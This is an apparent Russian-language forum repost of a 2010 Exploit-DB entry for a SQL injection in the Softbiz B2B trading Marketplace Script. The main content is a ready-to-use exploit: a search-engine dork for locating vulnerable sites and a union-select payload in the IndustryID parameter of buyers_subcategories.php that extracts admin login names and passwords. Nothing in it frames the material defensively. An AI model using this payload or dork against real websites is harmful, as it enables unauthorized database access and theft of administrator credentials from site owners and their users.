- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12245
- Проверка EDB
-
- Пройдено
- Автор
- ANGRY BOY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-04-15
Код:
# Exploit Title: Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability
# Date :15/4/2010
# Author : AnGrY BoY
# Contact: [email protected] & [email protected]
# Home : http://www.kurd-security.com
# Software Link : N/A
# Version : Softbiz B2B trading Marketplace Script
# Tested on : windows SP2
# CVE : 0
# Dork : buyers_subcategories.php?IndustryID=
# expolit:
# http://localhost/path/buyers_subcategories.php?IndustryID=[SQL]
# http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--
=============================================
# Gre3tZ :- all kurd-security members- Источник
- www.exploit-db.com
